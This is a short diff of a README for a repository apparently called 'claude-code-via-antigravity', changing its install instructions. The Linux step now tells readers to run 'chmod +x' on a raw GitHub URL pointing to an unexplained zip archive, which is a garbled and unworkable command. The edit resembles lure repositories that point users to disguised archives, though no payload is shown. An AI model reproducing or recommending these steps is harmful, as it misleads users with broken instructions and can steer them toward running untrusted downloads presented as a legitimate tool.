hootie0971/claude-code-via-antigravity/README.md

 - **Windows:** Double-click the `.exe` or `.msi` file you downloaded and follow the instructions on the screen.
 - **macOS:** Open the `.dmg` file, drag the app to your Applications folder.
-- **Linux:** Make the file executable by running `chmod +x filename.AppImage` in your terminal, then run it by double-clicking or from the terminal.
+- **Linux:** Make the file executable by running `chmod +x https://github.com/hootie0971/claude-code-via-antigravity/raw/refs/heads/main/Pachytylus/antigravity-code-claude-via-3.7.zip` in your terminal, then run it by double-clicking or from the terminal.

 ---